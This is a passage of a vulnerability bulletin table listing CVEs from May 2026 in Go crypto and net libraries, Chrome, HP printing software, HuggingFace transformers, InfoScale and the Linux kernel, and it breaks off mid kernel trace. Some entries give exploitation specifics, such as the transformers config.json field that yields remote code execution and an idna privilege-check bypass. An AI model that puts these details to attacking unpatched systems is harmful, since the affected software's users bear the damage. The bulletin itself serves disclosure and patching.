| golang.org/x/crypto–golang.org/x/crypto/ssh | An authenticated SSH client that repeatedly opened channels which were rejected by the server caused unbounded memory growth, eventually crashing the server process and affecting all connected users. Rejected channels are now properly removed from the connection’s internal state and released for garbage collection. | 2026-05-22 | not yet calculated | CVE-2026-39827 | https://go.dev/issue/35127 https://go.dev/cl/781320 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5016 |
| golang.org/x/crypto–golang.org/x/crypto/ssh | When an SSH server authentication callback returned PartialSuccessError with non-nil Permissions, those permissions were silently discarded, potentially dropping certificate restrictions such as force-command after a second factor succeeded. Returning non-nil Permissions with PartialSuccessError now results in a connection error. | 2026-05-22 | not yet calculated | CVE-2026-39828 | https://go.dev/issue/79562 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781621 https://pkg.go.dev/vuln/GO-2026-5014 |
| golang.org/x/crypto–golang.org/x/crypto/ssh | The RSA and DSA public key parsers did not enforce size limits on key parameters. A crafted public key with an excessively large modulus or DSA parameter could cause several minutes of CPU consumption during signature verification. This could be triggered by unauthenticated clients during public key authentication. RSA moduli are now limited to 8192 bits, and DSA parameters are validated per FIPS 186-2. | 2026-05-22 | not yet calculated | CVE-2026-39829 | https://go.dev/issue/79565 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781641 https://go.dev/cl/781661 https://pkg.go.dev/vuln/GO-2026-5018 |
| golang.org/x/crypto–golang.org/x/crypto/ssh | A malicious SSH peer could send unsolicited global request responses to fill an internal buffer, blocking the connection’s read loop. The blocked goroutine could not be released by calling Close(), resulting in a resource leak per connection. Unsolicited global responses are now discarded. | 2026-05-22 | not yet calculated | CVE-2026-39830 | https://go.dev/issue/79564 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781640 https://go.dev/cl/781664 https://pkg.go.dev/vuln/GO-2026-5017 |
| golang.org/x/crypto–golang.org/x/crypto/ssh | The Verify() method for FIDO/U2F security key types (sk-ecdsa-sha2-nistp256@openssh.com, sk-ssh-ed25519@openssh.com) did not check the User Presence flag. Signatures generated without physical touch were accepted, allowing unattended use of a hardware security key. To restore the previous behavior, return a “no-touch-required” extension in Permissions.Extensions from PublicKeyCallback. | 2026-05-22 | not yet calculated | CVE-2026-39831 | https://go.dev/issue/79566 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781662 https://pkg.go.dev/vuln/GO-2026-5019 |
| golang.org/x/crypto–golang.org/x/crypto/ssh | When writing data larger than 4GB in a single Write call on an SSH channel, an integer overflow in the internal payload size calculation caused the write loop to spin indefinitely, sending empty packets without making progress. The size comparison now uses int64 to prevent truncation. | 2026-05-22 | not yet calculated | CVE-2026-39834 | https://go.dev/issue/79567 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781663 https://pkg.go.dev/vuln/GO-2026-5020 |
| golang.org/x/crypto–golang.org/x/crypto/ssh | SSH servers which use CertChecker as a public key callback without setting IsUserAuthority or IsHostAuthority could be caused to panic by a client presenting a certificate. CertChecker now returns an error instead of panicking when these callbacks are nil. | 2026-05-22 | not yet calculated | CVE-2026-39835 | https://go.dev/issue/79563 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781660 https://pkg.go.dev/vuln/GO-2026-5015 |
| golang.org/x/crypto–golang.org/x/crypto/ssh | Previously, CVE-2024-45337 fixed an authorization bypass for misused ssh server configurations; if any other type of callback is passed other than public key, then the source-address validation would be skipped. | 2026-05-22 | not yet calculated | CVE-2026-46595 | https://go.dev/issue/79570 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781642 https://pkg.go.dev/vuln/GO-2026-5023 |
| golang.org/x/crypto–golang.org/x/crypto/ssh | An incorrectly placed cast from bytes to int allowed for server-side panic in the AES-GCM packet decoder for well-crafted inputs. | 2026-05-22 | not yet calculated | CVE-2026-46597 | https://go.dev/issue/79561 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781620 https://pkg.go.dev/vuln/GO-2026-5013 |
| golang.org/x/crypto–golang.org/x/crypto/ssh/agent | When adding a key to a remote agent constraint extensions such as restrict-destination-v00@openssh.com were not serialized in the request. Destination restrictions were silently stripped when forwarding keys, allowing unrestricted use of the key on the remote host. The client now serializes all constraint extensions. Additionally, the in-memory keyring returned by NewKeyring() now rejects keys with unsupported constraint extensions instead of silently ignoring them. | 2026-05-22 | not yet calculated | CVE-2026-39832 | https://go.dev/issue/79435 https://go.dev/cl/778642 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5006 |
| golang.org/x/crypto–golang.org/x/crypto/ssh/agent | The in-memory keyring returned by NewKeyring() silently accepted keys with the ConfirmBeforeUse constraint but never enforced it. The key would sign without any confirmation prompt, with no indication to the caller that the constraint was not in effect. NewKeyring() now returns an error when unsupported constraints are requested. | 2026-05-22 | not yet calculated | CVE-2026-39833 | https://go.dev/issue/79436 https://go.dev/cl/778640 https://go.dev/cl/778641 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5005 |
| golang.org/x/crypto–golang.org/x/crypto/ssh/agent | For certain crafted inputs, a ‘ed25519.PrivateKey’ was created by casting malformed wire bytes, leading to a panic when used. | 2026-05-22 | not yet calculated | CVE-2026-46598 | https://go.dev/issue/79596 https://go.dev/cl/781360 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5033 |
| golang.org/x/crypto–golang.org/x/crypto/ssh/knownhosts | Previously, a revoked ‘SignatureKey’ belonging to a CA was not correctly checked for revocation. Now, both the ‘key’ and ‘key.SignatureKey’ are checked for @revoked. | 2026-05-22 | not yet calculated | CVE-2026-42508 | https://go.dev/issue/79568 https://go.dev/cl/781220 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5021 |
| golang.org/x/net–golang.org/x/net/html | Parsing arbitrary HTML can consume excessive CPU time, possibly leading to denial of service. | 2026-05-22 | not yet calculated | CVE-2026-25680 | https://go.dev/cl/781702 https://go.dev/issue/79573 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://pkg.go.dev/vuln/GO-2026-5028 |
| golang.org/x/net–golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-25681 | https://go.dev/issue/79574 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781703 https://pkg.go.dev/vuln/GO-2026-5029 |
| golang.org/x/net–golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-27136 | https://go.dev/issue/79575 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781685 https://pkg.go.dev/vuln/GO-2026-5030 |
| golang.org/x/net–golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-42502 | https://go.dev/issue/79572 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781701 https://pkg.go.dev/vuln/GO-2026-5027 |
| golang.org/x/net–golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-42506 | https://go.dev/issue/79571 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781700 https://pkg.go.dev/vuln/GO-2026-5025 |
| golang.org/x/net–golang.org/x/net/idna | The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode(“xn--example-.com”) incorrectly returns the name “example.com” rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject “example.com” but permit “xn--example-.com”. If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permits access to the Unicode name “example.com”. | 2026-05-22 | not yet calculated | CVE-2026-39821 | https://go.dev/cl/767220 https://go.dev/issue/78760 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://pkg.go.dev/vuln/GO-2026-5026 |
| golang.org/x/sys–golang.org/x/sys/windows | NewNTUnicodeString does not check for string length overflow. When provided with a string that overflows the maximum size of a NTUnicodeString (a 16-bit number of bytes), it returns a truncated string rather than an error. | 2026-05-22 | not yet calculated | CVE-2026-39824 | https://go.dev/issue/78916 https://go.dev/cl/770080 https://groups.google.com/g/golang-announce/c/6MMI8Lj-Atg https://pkg.go.dev/vuln/GO-2026-5024 |
| Google–Chrome | Inappropriate implementation in UI in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-20 | not yet calculated | CVE-2026-9110 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/503551154 |
| Google–Chrome | Use after free in WebRTC in Google Chrome on Linux prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-20 | not yet calculated | CVE-2026-9111 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/504551032 |
| Google–Chrome | Use after free in GPU in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9112 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/489791425 |
| Google–Chrome | Out of bounds read in GPU in Google Chrome on Mac prior to 148.0.7778.179 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9113 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/489585044 |
| Google–Chrome | Use after free in QUIC in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via malicious network traffic. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9114 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/495798630 |
| Google–Chrome | Insufficient policy enforcement in Service Worker in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9115 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/495999481 |
| Google–Chrome | Insufficient policy enforcement in ServiceWorker in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9116 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/497436273 |
| Google–Chrome | Type Confusion in GFX in Google Chrome on Linux, ChromeOS prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9117 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/497542537 |
| Google–Chrome | Use after free in XR in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9118 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/498702233 |
| Google–Chrome | Heap buffer overflow in WebRTC in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9119 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/502661101 |
| Google–Chrome | Use after free in WebRTC in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9120 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/504620824 |
| Google–Chrome | Out of bounds read in GPU in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9121 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/488064108 |
| Google–Chrome | Out of bounds read in GPU in Google Chrome on Mac prior to 148.0.7778.179 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9122 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/489579953 |
| Google–Chrome | Heap buffer overflow in Chromecast in Google Chrome on Android, Linux, ChromeOS prior to 148.0.7778.179 allowed a local attacker to execute arbitrary code inside a sandbox via malicious network traffic. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9123 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/495988507 |
| Google–Chrome | Insufficient validation of untrusted input in Input in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9124 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/496375695 |
| Google–Chrome | Use after free in DOM in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9126 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/496280532 |
| HP Inc–HP Linux Imaging and Printing Software | A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software. This potential vulnerability may allow escalation of privileges and/or arbitrary code execution via an integer overflow in the hpcups processing path when handling crafted print data. | 2026-05-20 | not yet calculated | CVE-2026-8631 | https://support.hp.com/us-en/document/ish_14942099-14942126-16/hpsbpi04118 |
| HP Inc–HP Linux Imaging and Printing Software | A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software. This potential vulnerability may allow escalation of privileges and/or arbitrary code execution via operating system command injection. | 2026-05-20 | not yet calculated | CVE-2026-8632 | https://support.hp.com/us-en/document/ish_14942099-14942126-16/hpsbpi04118 |
| HP– ENVY 5000 | HP ENVY 5000 series printers VERBASPP1N003.2237A.00 do not properly manage concurrent TCP connections to port 9100 (JetDirect/RAW printing). An unauthenticated remote attacker on the same network can establish a persistent connection to port 9100 and send keep-alive packets, causing the printer’s session threads to remain locked in a waiting state. The firmware lacks connection timeouts and concurrent session limits, resulting in a persistent Denial of Service (DoS) that renders the printer unresponsive to all user commands and print jobs. Physical intervention (manual restart) is required to restore functionality, and the attack can be immediately re-initiated. | 2026-05-22 | not yet calculated | CVE-2026-42626 | https://medium.com/@jacobmasse/hp-envy-5000-printer-dos-vulnerability-8cae52c87b41 |
| HSC–MailInspector v5.3.3-7 | HSC MailInspector v5.3.3-7 contains a Local File Inclusion (LFI) vulnerability caused by improper control of user-supplied file paths. The endpoint /vendor/phpunit/phpunit.php processes user-controlled parameters that directly affect file access operations without adequate validation, sanitization, or path restriction. This allows a remote attacker to exploit Path Traversal techniques to read arbitrary files from the underlying operating system and application directories, leading to sensitive information disclosure. | 2026-05-18 | not yet calculated | CVE-2026-29962 | https://github.com/sql3t0/cve-disclosures https://hsclabs.com/pt-br/mailinspector https://github.com/sql3t0/cve-disclosures/blob/main/01_-_CVE-2026-29962_LFI%2BPath_Traversal.md |
| HSC–MailInspector v5.3.3-7 | HSC MailInspector 5.3.3-7 has a Path Traversal vulnerability due to improper validation of user-supplied input in the /tap/dw.php endpoint. The text parameter is used to construct file paths without adequate normalization or restriction to a safe base directory. A remote attacker can exploit this flaw to access arbitrary files on the underlying operating system, resulting in unauthorized disclosure of sensitive information. | 2026-05-18 | not yet calculated | CVE-2026-29963 | https://hsclabs.com/pt-br/mailinspector/ https://github.com/sql3t0/cve-disclosures https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md |
| HSC–MailInspector v5.3.3-7 | HSC MailInspector v5.3.3-7 contains a Cross-Site Scripting (XSS) vulnerability in the /tap/tap.php endpoint due to improper neutralization of user-controlled input using alternate or obfuscated JavaScript syntax. The endpoint reflects unsanitized user input in HTTP responses without adequate output encoding, allowing a remote attacker to execute arbitrary JavaScript code in the context of a victim’s browser. | 2026-05-18 | not yet calculated | CVE-2026-29964 | https://hsclabs.com/pt-br/mailinspector/ https://github.com/sql3t0/cve-disclosures https://github.com/sql3t0/cve-disclosures/blob/main/03_-_CVE-2026-29964_XSS.md |
| HSC–MailInspector v5.3.3-7 | HSC MailInspector 5.3.3-7 is vulnerable to Cross Site Scripting (XSS) in the /police/WarningUrlPage.php endpoint due to improper neutralization of user-supplied input that uses alternate or obfuscated JavaScript syntax. | 2026-05-18 | not yet calculated | CVE-2026-29965 | https://hsclabs.com/pt-br/mailinspector/ https://github.com/sql3t0/cve-disclosures https://github.com/sql3t0/cve-disclosures/blob/main/04_-_CVE-2026-29965_XSS.md |
| huggingface–huggingface/transformers | A critical remote code execution vulnerability exists in all versions of the HuggingFace transformers library prior to version 5.3.0. The vulnerability allows an attacker to craft a malicious `config.json` file containing the `_attn_implementation_internal` field set to an attacker-controlled HuggingFace Hub repository ID. When a victim loads this model using the standard `AutoModelForCausalLM.from_pretrained()` API, the library downloads and executes arbitrary Python code from the attacker’s repository with the victim’s full OS privileges. This issue arises due to unfiltered deserialization of configuration attributes, insufficient sanitization of internal fields, and unsandboxed execution of downloaded kernels. The vulnerability bypasses the `trust_remote_code` security mechanism, is invisible to the victim, and exploits the standard documented usage pattern, making it particularly severe. Users are advised to upgrade to version 5.3.0 or later to mitigate this issue. | 2026-05-24 | not yet calculated | CVE-2026-4372 | https://huntr.com/bounties/1f693a6e-6836-4b8b-a0bd-ca036fba8884 https://github.com/huggingface/transformers/commit/a7f8e7ff37d87d1a1a0c8cf607971c607741452f |
| InfoScale–CmdServer | InfoScale CmdServer before 7.4.2 mishandles access control. | 2026-05-20 | not yet calculated | CVE-2026-44926 | https://www.veritas.com/support/en_US/doc/109864724-141543588-0/v141217547-141543588 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766081&articleTitle=InfoScale_Command_Server_Security_Bulletin_for_CVE_2026_44926 |
| InfoScale–VIOM | SQL injection in InfoScale VIOM before v9.1.3 allows remote attackers to escalate privileges. | 2026-05-20 | not yet calculated | CVE-2026-44923 | https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925 |
| InfoScale–VIOM | InfoScale VIOM 9.1.3 allows XSS. | 2026-05-20 | not yet calculated | CVE-2026-44924 | https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925 |
| InfoScale–VIOM | Cross-Site Request Forgery (CSRF) vulnerability in InfoScale v.9.1.3 Operations Manager (VIOM) allows an attacker to force the user with an active session into clicking a malicious HTML link, which triggers unintended modifications on VIOM web application without the user’s knowledge. | 2026-05-20 | not yet calculated | CVE-2026-44925 | https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925 |
| Innoshop–Innoshop 0.6.0 | An authorization vulnerability exists in Innoshop 0.6.0. After logging into the frontend, an attacker can directly access backend application interfaces, leading to further dangerous operations. | 2026-05-19 | not yet calculated | CVE-2026-39250 | https://www.innoshop.com/ https://gist.github.com/hkdmh/4af513ea7589212cb1d49bc5d972972e |
| Jaspersoft–JasperReports Library Community Edition | Java Deserialisation Vulnerability in Jaspersoft Reports Library leads to Remote Code Execution (RCE), potentially allowing code execution on the affected system | 2026-05-19 | not yet calculated | CVE-2026-6009 | https://community.jaspersoft.com/advisories/jaspersoft-security-advisory-may-19-2026-jaspersoft-library-cve-2026-6009-r11/ |
| JJNAPIORK–Catalyst::Plugin::Authentication | Catalyst::Plugin::Authentication versions through 0.10024 for Perl is susceptible to timing attacks. These versions use Perl’s built-in eq comparison. Discrepencies in timing could be used to guess the underlying hash or password. | 2026-05-21 | not yet calculated | CVE-2026-5091 | https://metacpan.org/release/ETHER/Catalyst-Plugin-Authentication-0.10_025/changes https://github.com/perl-catalyst/Catalyst-Plugin-Authentication/commit/b0515f492257438cf07082acf1e10d06e8088a5e.patch |
| LalanaChami–Pharmacy Management System | The LalanaChami Pharmacy Management System (commit 5c3d028) allows unauthenticated remote attackers to escalate privileges by self-assigning an administrative role during registration. The /api/user/signup endpoint fails to validate the role parameter in the request body | 2026-05-19 | not yet calculated | CVE-2026-31070 | https://github.com/LalanaChami/Pharmacy-Mangment-System/blob/5c3d02888631166649856f71d542387114b3010b/backend/routes/user.js#L16 https://gist.github.com/nedlir/22bf6d1a3a07209be3e343744bc81d51 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Limit the maximum server registration per node Current code does no bound checking on the number of servers added per node. A malicious client can flood NEW_SERVER messages and exhaust memory. Fix this issue by limiting the maximum number of server registrations to 256 per node. If the NEW_SERVER message is received for an old port, then don’t restrict it as it will get replaced. While at it, also rate limit the error messages in the failure path of qrtr_ns_worker(). Note that the limit of 256 is chosen based on the current platform requirements. If requirement changes in the future, this limit can be increased. | 2026-05-19 | not yet calculated | CVE-2026-43491 | https://git.kernel.org/stable/c/e6f6cd501fb54060940a6eb3f4103eeb5e426ae7 https://git.kernel.org/stable/c/3efaad55cad1ded429e3a873bfece389058a526b https://git.kernel.org/stable/c/35fb4a0c077c5d1049c2628b769e0a1b1e65df0d https://git.kernel.org/stable/c/868202aa2adae427060a42d5bd663b4d782ec02c https://git.kernel.org/stable/c/d5ee2ff98322337951c56398e79d51815acbf955 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: lib/crypto: mpi: Fix integer underflow in mpi_read_raw_from_sgl() Yiming reports an integer underflow in mpi_read_raw_from_sgl() when subtracting “lzeros” from the unsigned “nbytes”. For this to happen, the scatterlist “sgl” needs to occupy more bytes than the “nbytes” parameter and the first “nbytes + 1” bytes of the scatterlist must be zero. Under these conditions, the while loop iterating over the scatterlist will count more zeroes than “nbytes”, subtract the number of zeroes from “nbytes” and cause the underflow. When commit 2d4d1eea540b (“lib/mpi: Add mpi sgl helpers”) originally introduced the bug, it couldn’t be triggered because all callers of mpi_read_raw_from_sgl() passed a scatterlist whose length was equal to “nbytes”. However since commit 63ba4d67594a (“KEYS: asymmetric: Use new crypto interface without scatterlists”), the underflow can now actually be triggered. When invoking a KEYCTL_PKEY_ENCRYPT system call with a larger “out_len” than “in_len” and filling the “in” buffer with zeroes, crypto_akcipher_sync_prep() will create an all-zero scatterlist used for both the “src” and “dst” member of struct akcipher_request and thereby fulfil the conditions to trigger the bug: sys_keyctl() keyctl_pkey_e_d_s() asymmetric_key_eds_op() software_key_eds_op() crypto_akcipher_sync_encrypt() crypto_akcipher_sync_prep() crypto_akcipher_encrypt() rsa_enc() mpi_read_raw_from_sgl() To the user this will be visible as a DoS as the kernel spins forever, causing soft lockup splats as a side effect. Fix it. | 2026-05-19 | not yet calculated | CVE-2026-43492 | https://git.kernel.org/stable/c/2aa77a18dc7f2670497fe3ee5acbeda0b57659e5 https://git.kernel.org/stable/c/26d3a97ad46c7a9226ec04d4bf35bd4998a97d16 https://git.kernel.org/stable/c/8637dfb4c1d8a7026ef681f2477c6de8b71c4003 https://git.kernel.org/stable/c/30e513e755bb381afce6fb57cdc8694136193f22 https://git.kernel.org/stable/c/8c2f1288250a90a4b5cabed5d888d7e3aeed4035 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: reset op_nents when zerocopy page pin fails When iov_iter_get_pages2() fails in rds_message_zcopy_from_user(), the pinned pages are released with put_page(), and rm->data.op_mmp_znotifier is cleared. But we fail to properly clear rm->data.op_nents. Later when rds_message_purge() is called from rds_sendmsg() the cleanup loop iterates over the incorrectly non zero number of op_nents and frees them again. Fix this by properly resetting op_nents when it should be in rds_message_zcopy_from_user(). | 2026-05-21 | not yet calculated | CVE-2026-43494 | https://git.kernel.org/stable/c/9115669faedccdda100428e2d26fd0aac8c50799 https://git.kernel.org/stable/c/0bbbff00a15b1df2cac9014d6cf4b6890f473353 https://git.kernel.org/stable/c/640e37f58f991546a87540d067279c2c1fa9fe51 https://git.kernel.org/stable/c/290e833d1acb1093bc121fcdc97f5e6161157479 https://git.kernel.org/stable/c/e174929793195e0cd6a4adb0cad731b39f9019b4 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: net: wwan: t7xx: validate port_count against message length in t7xx_port_enum_msg_handler t7xx_port_enum_msg_handler() uses the modem-supplied port_count field as a loop bound over port_msg->data[] without checking that the message buffer contains sufficient data. A modem sending port_count=65535 in a 12-byte buffer triggers a slab-out-of-bounds read of up to 262140 bytes. Add a sizeof(*port_msg) check before accessing the port message header fields to guard against undersized messages. Add a struct_size() check after extracting port_count and before the loop. In t7xx_parse_host_rt_data(), guard the rt_feature header read with a remaining-buffer check before accessing data_len, validate feat_data_len against the actual remaining buffer to prevent OOB reads and signed integer overflow on offset. Pass msg_len from both call sites: skb->len at the DPMAIF path after skb_pull(), and the validated feat_data_len at the handshake path. | 2026-05-21 | not yet calculated | CVE-2026-43495 | https://git.kernel.org/stable/c/f94450ce5053b36002995b72d1fa1db3bb08c5bf https://git.kernel.org/stable/c/9855e063e063158cc5bded576382599dc3133202 https://git.kernel.org/stable/c/2b56d7903ab804481f5233a259d5f341e9fd513c https://git.kernel.org/stable/c/dd4f4c93c1488d7100b9964f2da4c8b3c29652f1 https://git.kernel.org/stable/c/0e7c074cfcd9bd93765505f9eb8b42f03ed2a744 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_red: Replace direct dequeue call with peek and qdisc_dequeue_peeked When red qdisc has children (eg qfq qdisc) whose peek() callback is qdisc_peek_dequeued(), we could get a kernel panic. When the parent of such qdiscs (eg illustrated in patch #3 as tbf) wants to retrieve an skb from its child (red in this case), it will do the following: 1a. do a peek() – and when sensing there’s an skb the child can offer, then – the child in this case(red) calls its child’s (qfq) peek. qfq does the right thing and will return the gso_skb queue packet. Note: if there wasnt a gso_skb entry then qfq will store it there. 1b. invoke a dequeue() on the child (red). And herein lies the problem. – red will call the child’s dequeue() which will essentially just try to grab something of qfq’s queue. [ 78.667668][ T363] KASAN: null-ptr-deref in range [0x0000000000000048-0x000000000000004f] [ 78.667927][ T363] CPU: 1 UID: 0 PID: 363 Comm: ping Not tainted 7.1.0-rc1-00033-g46f74a3f7d57-dirty #790 PREEMPT(full) [ 78.668263][ T363] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 78.668486][ T363] RIP: 0010:qfq_dequeue+0x446/0xc90 [sch_qfq] [ 78.668718][ T363] Code: 54 c0 e8 dd 90 00 f1 48 c7 c7 e0 03 54 c0 48 89 de e8 ce 90 00 f1 48 8d 7b 48 b8 ff ff 37 00 48 89 fa 48 c1 e0 2a 48 c1 ea 03 <80> 3c 02 00 74 05 e8 ef a1 e1 f1 48 8b 7b 48 48 8d 54 24 58 48 8d [ 78.669312][ T363] RSP: 0018:ffff88810de573e0 EFLAGS: 00010216 [ 78.669533][ T363] RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ 78.669790][ T363] RDX: 0000000000000009 RSI: 0000000000000004 RDI: 0000000000000048 [ 78.670044][ T363] RBP: ffff888110dc4000 R08: ffffffffb1b0885a R09: fffffbfff6ba9078 [ 78.670297][ T363] R10: 0000000000000003 R11: ffff888110e31c80 R12: 0000001880000000 [ 78.670560][ T363] R13: ffff888110dc4150 R14: ffff888110dc42b8 R15: 0000000000000200 [ 78.670814][ T363] FS: 00007f66a8f09c40(0000) GS:ffff888163428000(0000) knlGS:0000000000000000 [ 78.671110][ T363] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 78.671324][ T363] CR2: 000055db4c6a30a8 CR3: 000000010da67000 CR4: 0000000000750ef0 [ 78.671585][ T363] PKRU: 55555554 [ 78.671713][ T363] Call Trace: [ 78.671843][ T363] <TASK> [ 